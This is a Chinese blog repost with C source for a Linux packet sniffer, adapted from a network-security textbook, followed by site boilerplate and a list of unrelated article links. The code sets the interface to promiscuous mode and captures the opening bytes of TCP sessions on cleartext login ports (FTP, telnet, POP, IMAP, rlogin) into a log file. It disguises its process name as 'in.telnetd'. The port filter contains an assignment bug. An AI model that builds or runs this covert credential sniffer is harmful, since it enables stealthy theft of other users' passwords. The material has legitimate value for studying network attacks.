linux c实现一个简单的sniffer

参考陈兵老师的《网络安全》一书
环境:kali linux+gcc 6.xx
具体的实现原理是,先将自己的网卡设置为混杂模式,然后从特殊的套接字中读取以太网帧,对读取的以太帧进行筛选、去报头。得到我们想要的数据。

#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>
#include<string.h>
#include<ctype.h>
#include<netdb.h>
#include<sys/file.h>
#include<sys/time.h>
#include<time.h>
#include<sys/socket.h>
#include<sys/ioctl.h>
#include<sys/signal.h>
#include<net/if.h>
#include<arpa/inet.h>
#include<netinet/in.h>
#include<netinet/ip.h>
#include<netinet/tcp.h>
#include<netinet/if_ether.h>#define CAPLEN 512
#define TIMEOUT 30
#define TCPLOG "tcp.log"struct etherpacket{struct ethhdr eth;//以太网帧的头部struct iphdr ip;//IP报头struct tcphdr tcp;//tcp报头char   buff[8192];//数据
}ep;struct{unsigned long saddr;//源地址unsigned long daddr;//目标地址unsigned short sport;//源端口unsigned short dport;//目标端口int bytes_read;char active;//目标主机是否处于活跃状态time_t start_time;
}victim;struct iphdr *ip;
struct tcphdr *tcp;
int s;
FILE *fp;int openintf(char *);
void clear_victim(void);
void cleanup(int);
char *hostlookup(unsigned long int);
int print_header(void);
int read_tcp(int);int filter(void){//对读取的以太帧进行筛选int p=0;if(ip->protocol!=6)return 0;if(victim.active!=0)if(victim.bytes_read>CAPLEN){fprintf(fp,"\n-- -- - [CAPLEN Exceeded]\n");clear_victim();return 0;}if(victim.active!=0)if(time(NULL)>(victim.start_time+TIMEOUT)){fprintf(fp,"\n-- -- - [Time Out]\n");return 0;}int dest=ntohs(tcp->dest);//ntohs(),将网络字节序转换为十进制字节序if(dest==21||dest==23||dest==110||dest==109||dest==143||dest==513||dest==106)p=1;if(victim.active==0)if(p=1)if(tcp->syn==1){victim.saddr=ip->saddr;victim.daddr=ip->daddr;victim.active=1;victim.sport=tcp->source;victim.dport=tcp->dest;victim.bytes_read=0;victim.start_time=time(NULL);print_header();}if(tcp->dest!=victim.dport)return 0;if(tcp->source!=victim.sport)return 0;if(ip->saddr!=victim.saddr)return 0;if(ip->daddr!=victim.daddr)return 0;if(tcp->rst==1){victim.active=0;alarm(0);fprintf(fp,"\n-- -- -[RST]\n");clear_victim();return 0;}if(tcp->fin==1){victim.active=0;alarm(0);fprintf(fp,"\n-- -- - [FIN]\n");clear_victim();return 0;}return 1;
}int read_tcp(int a){int x;while(1){x=read(s,(struct etherpacket*)&ep,sizeof(ep));//read(),从目标文件中读取以太网帧if(x>1){if(filter()==0)continue;x-=54;if(x<1)continue;return x;}}
}int print_header(void){fprintf(fp,"\n");fprintf(fp,"%s=>",hostlookup(ip->saddr));fprintf(fp,"%s[%d]\n",hostlookup(ip->daddr),ntohs(tcp->dest));
}int print_data(int datalen,char *data){int i=0;int t=0;victim.bytes_read+=datalen;for(i=0;i!=datalen;i++){if(data[i]==13){fprintf(fp,"\n");t=0;}if(isprint(data[i])){fprintf(fp,"%c",data[i]);t++;}if(t>75){t=0;fprintf(fp,"\n");}}
}char *hostlookup(unsigned long int in){static char blah[1024];struct in_addr i;struct hostent *he;i.s_addr=in;he=gethostbyaddr((char *)&i,sizeof(struct in_addr),AF_INET);//获取IP对应目标主机的主机名if(he==NULL)strcpy(blah,inet_ntoa(i));else strcpy(blah,he->h_name);return blah;
}void clear_victim(void){victim.saddr=0;victim.daddr=0;victim.sport=0;victim.dport=0;victim.active=0;victim.bytes_read=0;victim.start_time=0;
}void cleanup(int sig){fprintf(fp,"Exiting..\n");close(s);fclose(fp);exit(0);
}int openintf(char *d){int fd;struct ifreq ifr;int s;fd=socket(AF_INET,SOCK_PACKET,htons(0x800));//SOCK_PACKET用于获取以太网帧的套接字if(fd<0){perror("can't get SOCK_PACKET");exit(0);}strcpy(ifr.ifr_name,d);s=ioctl(fd,SIOCGIFFLAGS,&ifr);//I/O管道控制函数if(s<0){close(fd);perror("can't get flags");exit(0);}ifr.ifr_flags|=IFF_PROMISC;s=ioctl(fd,SIOCSIFFLAGS,&ifr);if(s<0)perror("can't set promiscuous mode");return fd;}int main(int argc,char *argv[]){sprintf(argv[0],"%s","in.telnetd");s=openintf("eth0");ip=(struct iphdr*)(((unsigned long)&ep.ip)-2);tcp=(struct tcphdr*)(((unsigned long)&ep.tcp)-2);if(argc==2)fp=stdout;else fp=fopen(TCPLOG,"at");if(fp==NULL){fprintf(stderr,"can't open log\n");exit(0);}clear_victim();for(;;){read_tcp(s);if(victim.active!=0)print_data(htons(ip->tot_len)-sizeof(ep.ip)-sizeof(ep.tcp),ep.buff-2);sleep(1);fflush(fp);}return 0;
}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/375964.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Java12题:发奖金问题

Java12题:发奖金问题

题目&#xff1a;企业发放的奖金根据利润提成。利润(I)低于或等于10万元时&#xff0c;奖金可提10%&#xff1b;利润高于10万元&#xff0c;低于20万元时&#xff0c;低于10万元的部分按10%提成&#xff0c;高于10万元的部分&#xff0c;可可提成7.5%&#xff1b;20万到40万之间…
阅读更多...
Linux第一条指令地址,arm-linux 启动代码分析——stage1 (1)

Linux第一条指令地址,arm-linux 启动代码分析——stage1 (1)

本文针对arm linux, 从kernel的第一条指令开始分析,一直分析到进入start_kernel()函数.我们当前以linux-2.6.19内核版本作为范例来分析,本文中所有的代码,前面都会加上行号以便于和源码进行对照.例:在文件init/main.c中:00478: asmlinkage void __init start_kernel(void)前面的…
阅读更多...
C#--序列化与反序列化

C#--序列化与反序列化

引用: 序列化与反序列化 解释: 序列化,就是将一个对象保存到文件中去,而反序列化就是将该文件重新保存为一个对象. 序列化的三种方式: 1.BinaryFormatter class BinarySerialize : ISerialize{FileStream fs;string filepath "D:/1/1.txt";public void Serialize(Bo…
阅读更多...
开启linux ssh

开启linux ssh

kali linux在开机的时候ssh服务是默认关闭的&#xff0c;可通过以下方法开启服务
阅读更多...
Android中实现全屏、无标题栏的两种办法(另附Android系统自带样式的解释)(转)...

Android中实现全屏、无标题栏的两种办法(另附Android系统自带样式的解释)(转)...

实现全屏无标题栏&#xff1a; 1.在xml文件中进行配置 AndroidManifest.xml中&#xff0c;找到需要全屏或设置成无标题栏的Activity&#xff0c;在该Activity进行如下配置即可。 实现全屏效果&#xff1a; android:theme"android:style/Theme.NoTitleBar.Fullscreen"…
阅读更多...
格式化linux grub,linux grub 引导启动过程详解

格式化linux grub,linux grub 引导启动过程详解

机器加电启动后,BIOS开始检测系统参数,如内存的大小,日期和时间,磁盘设备以及这些磁盘设备用来引导的顺序,通常情况下&#xff0c;BIOS都是被配置成首先检查软驱或者光驱(或两者都检查)&#xff0c;然后再尝试从硬盘引导。如果在这些可移动的设备中&#xff0c;没有找到可引导的…
阅读更多...
DevExpress GridControl 后台设置列

DevExpress GridControl 后台设置列

/// <summary>/// 初始化GridView /// </summary>/// <param name"gv">GridView 名称</param>/// <param name"captions">列标题</param>/// <param name"fieldName">列字段</param>/// <pa…
阅读更多...
linux c实现myecho、mycat、mycp

linux c实现myecho、mycat、mycp

myecho、mycat、mycp分别用于模拟系统命令echo、cat、cp 代码如下&#xff1a; myecho #include<stdlib.h> #include<stdio.h> int main(int argc,char *argv[]){if(argc1){printf("Error:need parameter!\n");exit(0);}for(int i1;i<argc;i)print…
阅读更多...
Emmet快速开发

Emmet快速开发

标签元素关系展开 div.wrap>div.content>(div.inner_ldiv.inner_r)^div.sider------缩写展开如下----------------------------------------------<div class"wrap"><div class"content"><div class"inner_l"></div&…
阅读更多...
IOS 基于APNS消息推送原理与实现(JAVA后台)

IOS 基于APNS消息推送原理与实现(JAVA后台)

Push的原理&#xff1a;Push 的工作机制可以简单的概括为下图图中&#xff0c;Provider是指某个iPhone软件的Push服务器&#xff0c;这篇文章我将使用.net作为Provider。APNS 是Apple Push Notification Service&#xff08;Apple Push服务器&#xff09;的缩写&#xff0c;是苹…
阅读更多...
suse linux 查看cpu,Suse Linux zmd 耗用100% CPU

suse linux 查看cpu,Suse Linux zmd 耗用100% CPU

最近的SUSE Linux 10(SP3)的top命令总是显示zmd进程耗用了100%的CPU资源&#xff0c;而整个系统中system级别占用CPU则占用了40%以上且根本不曾释放。尝试重启服务器之后&#xff0c;故障依旧。下面是这个问题的描述与处理。1、top命令显示zmd cpu占用100%&#xff0c;system u…
阅读更多...
linux系统调用open、write、close、read以及stat函数详解

linux系统调用open、write、close、read以及stat函数详解

学习笔记 参考链接1 、参考链接2以及百度百科 在进行C语言学习的时候我们了解到了C语言相关的一些IO操作&#xff0c;如fopen&#xff0c;fwrite&#xff0c;fread&#xff0c;fprintf&#xff0c;fclose等相关函数&#xff0c;他们都是由C库函数提供的一些函数&#xff0c;是…
阅读更多...
关于objective-c的一点随笔

关于objective-c的一点随笔

多日混迹cocoachina&#xff0c;这篇随笔算是积累点前人经验吧。 首先&#xff0c;要多逛两个很好的网站&#xff0c;Stack Overflow和github. 对于新人&#xff0c;一定要注意良好的格式和命名&#xff0c;不然对于日后回头看代码会非常难&#xff0c;oc不限制变量名称和函数名…
阅读更多...
【转载】Ubuntu环境下配置Android Studio

【转载】Ubuntu环境下配置Android Studio

之前学习Android开发的时候&#xff0c;一直跟各种教程一样&#xff0c;使用的是EclipseADT&#xff0c;主要是比较方便&#xff0c;容易上手&#xff0c;特别是对于习惯用Eclipse开发java的朋友来说&#xff0c;上手更是好无压力。但毕竟EclipseADT最多只能算Google的干儿子&a…
阅读更多...
linux怎么进去vi编辑器,red hat enterprise linux开机怎么进入vi编辑器界面?

linux怎么进去vi编辑器,red hat enterprise linux开机怎么进入vi编辑器界面?

2015-05-21 回答后面输入直接打回车就会显示出来如下xx文件#■sa■jsadjk#■sa■jsklfjdl kl■sa&#xff1a;----现在是低行模式 现在按esc 进入第一个模式(命令模式)就变成下面xx文件#dsadjsadjk#dsadjsklfjdl kldsa现在我们按个v 就进入可是模式 现在我们一个移动光标选择要…
阅读更多...
数据结构--链式线性表

数据结构--链式线性表

环境&#xff1a;dev c #include<stdio.h> #include<stdlib.h>typedef struct LNode *List; typedef int ElementType;struct LNode{ElementType Data;List next; };int Length(List Ptrl); List FindKth(int k,List Ptrl); List Find(ElementType x,List Ptrl); …
阅读更多...
linux査 到漠河 装apache,如何在Ubuntu上搭建一台安全的Apache Web服务器

linux査 到漠河 装apache,如何在Ubuntu上搭建一台安全的Apache Web服务器

满意答案1.安装Apache2使用下面这个命令&#xff0c;安装Apache2及其他库。1$ sudo apt-get -y install apt-get install apache2 apache2.2-common apache2-doc apache2-mpm-prefork apache2-utils libexpat1 ssl-cert libapache2-mod-php5 php5 php5-common php5-gd php5-cli…
阅读更多...
vs2010 中添加 ActiveX Control Test Container工具

vs2010 中添加 ActiveX Control Test Container工具

vs2010中的TSTCON( ActiveX Control Test Container )工具非自动安装&#xff0c;而是作为一个例程提供。所以应找到该例程&#xff0c;并编译&#xff1a; 如vs2010安装在默认路径则 1, 进入&#xff1a;C:\Program Files\Microsoft Visual Studio 10.0\Samples\1033&#xff…
阅读更多...
linux c实现mypwd

linux c实现mypwd

这个其实很简单&#xff0c;只需要调用getcwd()这个函数就行了。 char *getcwd(char *buffer,int maxlen); 功能&#xff1a;获取当前工作目录 参数&#xff1a;buffer指向用来存储绝对路径的数组&#xff0c;maxlen绝对路径的字符大小 返回&#xff1a;成功则返回当前的工作目…
阅读更多...
安装Discuz

安装Discuz

1.下载Discuz 版本文件http://download.comsenz.com/DiscuzX/3.2/Discuz_X3.2_SC_GBK.zip2.下载PHPhttp://windows.php.net/downloads/releases/php-5.6.9-Win32-VC11-x64.zip把里面文件的php.ini-development 更名为php.ini Uncomment下列语句 extension_dir "ext"…
阅读更多...
最新文章

Copyright @ 2022~2023